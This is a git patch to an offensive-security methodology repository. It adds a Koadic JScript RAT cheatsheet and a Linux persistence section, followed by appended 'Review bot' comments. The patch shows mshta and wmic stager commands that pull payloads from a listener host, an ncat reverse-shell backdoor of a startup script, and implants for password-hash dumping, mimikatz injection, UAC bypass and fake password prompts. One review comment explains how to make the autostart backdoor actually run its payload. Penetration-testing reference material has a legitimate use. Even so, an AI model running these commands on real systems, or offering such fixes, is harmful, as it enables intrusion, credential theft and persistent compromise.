From 9ebf2057c57a85caad3dfa3c7ca7fde35b9ba180 Mon Sep 17 00:00:00 2001 From: Swissky Date: Thu, 4 Oct 2018 17:35:57 +0200 Subject: [PATCH] Koadic Cheatsheet + Linux persistence in startup .desktop file --- .../Active Directory Attack.md | 4 +- .../Koadic - Cheatsheat.md | 123 ++++++++++++++++++ .../Linux - Persistence.md | 17 ++- 3 files changed, 141 insertions(+), 3 deletions(-) create mode 100644 Methodology and Resources/Koadic - Cheatsheat.md diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 4c8c305..738d062 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -117,8 +117,8 @@ Metasploit modules to enumerate shares and credentials ```c scanner/smb/smb_enumshares -windows/gather/enumshares -windows/gather/credentials/gpp +post/windows/gather/enum_shares +post/windows/gather/credentials/gpp ``` Crackmapexec modules diff --git a/Methodology and Resources/Koadic - Cheatsheat.md b/Methodology and Resources/Koadic - Cheatsheat.md new file mode 100644 index 0000000..1847be4 --- /dev/null +++ b/Methodology and Resources/Koadic - Cheatsheat.md 
@@ -0,0 +1,123 @@ +# Koadic C3 COM Command & Control - JScript RAT + +> Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. + +## Installation + +```powershell +git clone https://github.com/zerosum0x0/koadic +git submodule init +git submodule update +pip2.7 install -r requirements.txt --user +python2.7 koadic +``` + +## Set a listener + +```powershell +use stager/js/mshta +set LHOST 192.168.1.19 +set SRVPORT 4444 +run + +[>] mshta http://192.168.1.19:4444/6DX7f +``` + +```powershell +use stager/js/wmic +set LHOST 192.168.1.19 +set SRVPORT 4444 +run + +[>] wmic os get /FORMAT:"http://192.168.1.19:4444/lQGx5.xsl" +``` + +### Stagers + +Stagers hook target zombies and allow you to use implants. + +Module | Description +--------|------------ +stager/js/mshta | serves payloads using MSHTA.exe HTML Applications +stager/js/regsvr | serves payloads using regsvr32.exe COM+ scriptlets +stager/js/wmic | serves payloads using WMIC XSL +stager/js/rundll32_js | serves payloads using rundll32.exe +stager/js/disk | serves payloads using files on disk + + + +## List zombies and interact with them + +```powershell +(koadic: sta/js/wmic)$ zombies + + ID IP STATUS LAST SEEN + --- --------- ------- ------------ + 0 192.168.1.30 Alive 2018-10-04 17:07:12 + +(koadic: sta/js/wmic)$ zombies 0 + ID: 0 + Status: Alive + First Seen: 2018-10-04 17:05:00 + Last Seen: 2018-10-04 17:14:42 + IP: 192.168.1.30 + User: DESKTOP-68URA9U\CrashWin + [...] + Elevated: No + [...] +``` + +Interact with `zombies zombie_id`, get a shell with `cmdshell zombie_id`. + +```powershell +[koadic: ZOMBIE 0 (192.168.1.30) - C:\Users\CrashWin]> whoami +[*] Zombie 0: Job 1 (implant/manage/exec_cmd) created. +[+] Zombie 0: Job 1 (implant/manage/exec_cmd) completed. 
+Result for `cd C:\Users\CrashWin & whoami`: +desktop-68ura9u\crashwin +``` + +## Use an implant + +Select an implant with `use module`, then fill the `info` with `set INFO value`, finally start the module with `run`. + +```powershell +(koadic: sta/js/mshta)$ use implant/phish/password_box +(koadic: imp/phi/password_box)$ set ZOMBIE 1 +(koadic: imp/phi/password_box)$ run +Input contents: +MyStrongPassword123! +``` + +### Implants + +Implants start jobs on zombies. + +Module | Description +--------|------------ +implant/elevate/bypassuac_eventvwr | Uses enigma0x3's eventvwr.exe exploit to bypass UAC on Windows 7, 8, and 10. +implant/elevate/bypassuac_sdclt | Uses enigma0x3's sdclt.exe exploit to bypass UAC on Windows 10. +implant/fun/zombie | Maxes volume and opens The Cranberries YouTube in a hidden window. +implant/fun/voice | Plays a message over text-to-speech. +implant/gather/clipboard | Retrieves the current content of the user clipboard. +implant/gather/enum_domain_info | Retrieve information about the Windows domain. +implant/gather/hashdump_sam | Retrieves hashed passwords from the SAM hive. +implant/gather/hashdump_dc | Domain controller hashes from the NTDS.dit file. +implant/gather/user_hunter | Locate users logged on to domain computers (using Dynamic Wrapper X). +implant/inject/mimikatz_dynwrapx | Injects a reflective-loaded DLL to run powerkatz.dll (using Dynamic Wrapper X). +implant/inject/mimikatz_dotnet2js | Injects a reflective-loaded DLL to run powerkatz.dll (@tirannido DotNetToJS). +implant/inject/shellcode_excel | Runs arbitrary shellcode payload (if Excel is installed). +implant/manage/enable_rdesktop | Enables remote desktop on the target. +implant/manage/exec_cmd | Run an arbitrary command on the target, and optionally receive the output. +implant/phishing/password_box | Prompt a user to enter their password. +implant/pivot/stage_wmi | Hook a zombie on another machine using WMI. 
+implant/pivot/exec_psexec | Run a command on another machine using psexec from sysinternals. +implant/scan/tcp | Uses HTTP to scan open TCP ports on the target zombie LAN. +implant/utils/download_file | Downloads a file from the target zombie. +implant/utils/multi_module | Run a number of implants in succession. +implant/utils/upload_file | Uploads a file from the listening server to the target zombies. + +## Thanks + +- [Pentestlab - koadic](https://pentestlab.blog/tag/koadic/) +- [zerosum0x0 Github - koadic](https://github.com/zerosum0x0/koadic) \ No newline at end of file diff --git a/Methodology and Resources/Linux - Persistence.md b/Methodology and Resources/Linux - Persistence.md index dcc068f..a0ad6ab 100644 --- a/Methodology and Resources/Linux - Persistence.md +++ b/Methodology and Resources/Linux - Persistence.md @@ -41,7 +41,6 @@ fi rm /tmp/$TMPNAME2 ``` - ## Backdooring a startup service ```bash @@ -49,6 +48,22 @@ RSHELL="ncat $LMTHD $LHOST $LPORT -e \"/bin/bash -c id;/bin/bash\" 2>/dev/null" sed -i -e "4i \$RSHELL" /etc/network/if-up.d/upstart ``` +## Backdooring an user startup file + +Linux, write a file in `~/.config/autostart/NOM_OF_FILE.desktop` + +```powershell +In : ~/.config/autostart/*.desktop + +[Desktop Entry] +Type=Application +Name=Welcome +Exec=/var/lib/gnome-welcome-tour +AutostartCondition=unless-exists ~/.cache/gnome-getting-started-docs/seen-getting-started-guide +OnlyShowIn=GNOME; +X-GNOME-Autostart-enabled=false +``` + ## Backdooring a driver ```bash
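Review bot: in the `Active Directory Attack.md` hunk, adding the `post/` prefix to the two `windows/gather/...` lines leaves `scanner/smb/smb_enumshares` on the line above as the only entry without its full module path; for consistency (and so all three lines paste straight into `use`), write it as `auxiliary/scanner/smb/smb_enumshares`. The fence around that list is also tagged ```c although it holds Metasploit module names, not C; a plain or `bash` fence reads better.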
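Review bot: the new file is created as `Methodology and Resources/Koadic - Cheatsheat.md` while the commit subject and the heading style of the repository say "Cheatsheet"; rename the file before merge, since the name is what shows up in the index and in links. The file also ends with `\ No newline at end of file`, so every future edit to the last bullet will show up as a spurious change to that line; add the trailing newline.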
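Review bot: in the "Use an implant" example the module is selected as `implant/phish/password_box` and the prompt shows the tool's own abbreviation `imp/phi/password_box`, but the "Implants" table below lists it as `implant/phishing/password_box`; the two disagree, and since the prompt is generated from the real module path, the table entry should be corrected to `implant/phish/password_box`. In the same example `set ZOMBIE 1` targets a zombie that does not exist in the session shown earlier (the `zombies` listing has only ID 0); use `set ZOMBIE 0` so the walkthrough is consistent end to end. The "Stagers" table also carries three stray blank lines before the next heading.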
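Review bot: the `.desktop` entry in the new "Backdooring an user startup file" section never executes as written: `X-GNOME-Autostart-enabled=false` is exactly the key gnome-session writes to disable an autostart entry, and `AutostartCondition=unless-exists ~/.cache/gnome-getting-started-docs/seen-getting-started-guide` additionally suppresses it once that marker file exists (it is a copy of the stock welcome-tour entry). For a persistence example drop both keys (or set `X-GNOME-Autostart-enabled=true`), replace `Exec=/var/lib/gnome-welcome-tour` with the payload, and mention that `OnlyShowIn=GNOME;` limits the trigger to GNOME sessions. Minor points in the same hunk: the heading should read "Backdooring a user startup file", `NOM_OF_FILE` should be `NAME_OF_FILE`, the fence is tagged ```powershell for an INI-style desktop entry (`ini` fits), and the `In : ~/.config/autostart/*.desktop` line inside the fence duplicates the sentence above it and should be removed from the code block. The preceding hunk in this file only deletes a blank line before "## Backdooring a startup service", an unrelated whitespace change that is better left out of this commit.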